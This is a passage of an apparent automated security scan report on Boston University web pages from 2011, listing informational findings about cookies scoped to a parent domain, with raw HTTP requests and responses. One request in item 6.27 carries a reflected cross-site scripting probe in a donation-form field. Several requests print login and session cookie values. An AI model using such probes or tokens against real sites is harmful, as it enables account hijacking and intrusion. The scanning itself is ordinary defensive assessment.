User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:01:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Tue, 24 May 2011 14:44:12 GMT
ETag: "1bd400b200001234-e4a5-4a4069f0c8744"
Accept-Ranges: bytes
Content-Length: 58533
X-BU-Main-Uniqueid: ToybaQrxHDYAAEndiNsAAAWQ
X-BU-Duration: D=12581
X-BU-Backend: (null) (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

6.27. https://www.bu.edu/alumni-forms/images/happygroup.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/images/happygroup.jpg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alumni-forms/images/happygroup.jpg HTTP/1.1
Host: www.bu.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.bu.edu/phpbin/telegraph/?form_location=%2Falumni-forms%2Fforms%2Fgiving%2Fonline%2Findex%2F&form_filename=index.html&form_configuration=donate.xml&first_name=&last_name=&address=&city=&state=n%2Fa&country=United+States&zip=&phone=&email=&school=n%2Fa&year=&caller=&amount_other=&matching=&number_of_months=%23+of&designation=&fund_other=2850d%3Cscript%3Ealert(document.location)%3C/script%3Ef93343ad016b277d2&comments=&submit2=Make+Your+Gift
Cookie: isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:10:07 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Set-Cookie: wantsMobile=false_1.2_default; path=/; domain=.bu.edu
Last-Modified: Thu, 29 Jul 2010 20:01:45 GMT
ETag: "1bd4022600001234-64b4-48c8c34251c47"
Accept-Ranges: bytes
Content-Length: 25780
X-BU-Main-Uniqueid: ToydfwrxHD4AAAmrTiIAAAAM
X-BU-Duration: D=10064
X-BU-Backend: content_default (null)
Content-Type: image/jpeg
Via: 1.1 www.bu.edu
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

......JFIF.....d.d......Ducky.......7......Adobe.d....................
...
.    ..    ..................................##########...............#################################################...........
...[SNIP]...

6.28. https://www.bu.edu/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:02 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:21:08 GMT
Accept-Ranges: bytes
Content-Length: 19106
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:36:02 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiZgrxHDYAAGUNv1QAAAMR
X-BU-Duration: D=12731
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

6.29. https://www.bu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 30 Jan 2008 00:16:42 GMT
ETag: "1bf308d800001234-13e-444e574a4ce83"
Accept-Ranges: bytes
Content-Length: 318
X-BU-Main-Uniqueid: ToybDgrxHDYAAEaPWxgAAATW
X-BU-Duration: D=5560
X-BU-Backend: (null) (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

..............(.......(....... .......................................``..ff..................................................wwwwwwwwwwwwwwww.........................Ww07w0...0qt.p...0pr.p...v0r.p...
...[SNIP]...

6.30. https://www.bu.edu/help/tech/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /help/tech/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/tech/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:39 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Mon, 02 Aug 2010 15:28:10 GMT
ETag: "1420053200001234-2ea2-48cd8d9199681"
Accept-Ranges: bytes
Content-Length: 11938
X-BU-Main-Uniqueid: ToyiTwrxHDYAAGJVrjsAAAHQ
X-BU-Duration: D=9453
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6.31. https://www.bu.edu/help/tech/qa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /help/tech/qa/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/tech/qa/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:40 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 02 Mar 2011 16:29:08 GMT
ETag: "1420040800001234-1b28-49d82697dbd01"
Accept-Ranges: bytes
Content-Length: 6952
X-BU-Main-Uniqueid: ToyiUArxHDYAAGUNvhkAAAMS
X-BU-Duration: D=12629
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...

6.32. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin?session=a48b5fc44e9c3778dbfa93d21a2f878d:cussp-srv3&AuthServCd=it_kerb&LoginPromptInd=ON&SidPromptInd=&reason=Initial%2520request%2520for%2520authentication&app=Alumni%2520Directory%2520Harris&contact=%253Ca%2520href%253D%2522mailto%253Aacct-mgr%2540bu.edu%2522%253EAccount%2520Manager%253C%252Fa%253E&ext=alum&OptimisticLoginInd=ON&LoginPromptTime=1317837692&SidCheckPromptTime= HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.19.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3

Response

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:01:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Location: https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.8971
Content-Length: 293
Content-Type: text/html; charset=iso-8859-1
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybfQrxHDYAAEnch14AAAKc
X-BU-Duration: D=288046
X-BU-Backend: builtin (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://weblogin.bu.edu/web@login3/1317837693/5
...[SNIP]...

6.33. https://www.bu.edu/link/bin/uiscgi_studentlink  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_studentlink

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link/bin/uiscgi_studentlink HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 17:47:35 GMT
Server: Apache/2.2.0 (BU-Version1)
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyYNwrxHD4AAFEANUgAAAKM
X-BU-Duration: D=361723
X-BU-Backend: builtin (null)
Connection: close

<!-- ----------------------------------------------------------------
This was generated for
at Wed Oct 5 13:47:36 2011
...[SNIP]...

6.34. https://www.bu.edu/phpbin/search/cms.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /phpbin/search/cms.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /phpbin/search/cms.php HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Wed, 05 Oct 2011 18:30:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d PHP/4.4.9
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/4.4.9
Location: http://www.bu.edu/phpbin/search/?q=&client=default_frontend&output=xml_no_dtd&proxystylesheet=default_frontend&t=index
Content-Length: 0
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiYwrxHDYAAGV6ygAAAARG
X-BU-Duration: D=34973
X-BU-Backend: http://webapps-881.bu.edu:180 (null)
Connection: close


6.35. https://www.bu.edu/phpbin/telegraph/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /phpbin/telegraph/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /phpbin/telegraph/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: https://www.bu.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bu.edu/alumni-forms/forms/giving/online/index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

form_location=%2Falumni-forms%2Fforms%2Fgiving%2Fonline%2Findex%2F&form_filename=index.html&form_configuration=donate.xml&first_name=&last_name=&address=&city=&state=n%2Fa&country=United+States&zip=&p
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:01:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d PHP/4.4.9
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybcgrxHDYAAEnbg64AAAQM
X-BU-Duration: D=1007362
X-BU-Backend: http://webapps-881.bu.edu:180 (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 59702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

6.36. https://www.bu.edu/tech/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/about/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/about/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:24 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:20:00 GMT
Accept-Ranges: bytes
Content-Length: 67007
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:24 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQArxHDYAAGUNvSUAAAMM
X-BU-Duration: D=8774
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6.37. https://www.bu.edu/tech/accounts/wireless/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/accounts/wireless/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/accounts/wireless/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://netreg.bu.edu/faq.cgi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:37 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 17:59:36 GMT
Accept-Ranges: bytes
Content-Length: 69132
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:04:37 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybCQrxHDYAAEY9TssAAAIA
X-BU-Duration: D=9325
X-BU-Backend: niscms http://wwwcms02.bu.edu
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

6.38. https://www.bu.edu/tech/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/contact/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/contact/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:23 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPwrxHDYAAGJWsScAAAFN
X-BU-Duration: D=366081
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6.39. https://www.bu.edu/tech/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/feed/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:28 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 18:17:42 GMT
ETag: "999deaaf7fef0449c165077299c01d7a"
Content-Type: text/xml; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiRArxHDYAAGUMuo8AAAKJ
X-BU-Duration: D=224232
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

6.40. https://www.bu.edu/tech/policies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/policies/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/policies/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:27 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:19:59 GMT
Accept-Ranges: bytes
Content-Length: 68846
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:27 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQwrxHDYAAGUNvWMAAAMB
X-BU-Duration: D=8720
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6.41. https://www.bu.edu/tech/projects/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/projects/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/projects/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:26 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:20:00 GMT
Accept-Ranges: bytes
Content-Length: 66854
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:26 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQgrxHDYAAGJVrYoAAAHY
X-BU-Duration: D=10295
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6.42. https://www.bu.edu/tech/service/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/service/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/service/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:25 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:24 GMT
Accept-Ranges: bytes
Content-Length: 67216
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:25 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQQrxHDYAAGUMumgAAAKZ
X-BU-Duration: D=11105
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

6.43. https://www.bu.edu/tech/services/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/alumni/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/alumni/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:22 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPgrxHDYAAGUMulEAAAKP
X-BU-Duration: D=386473
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
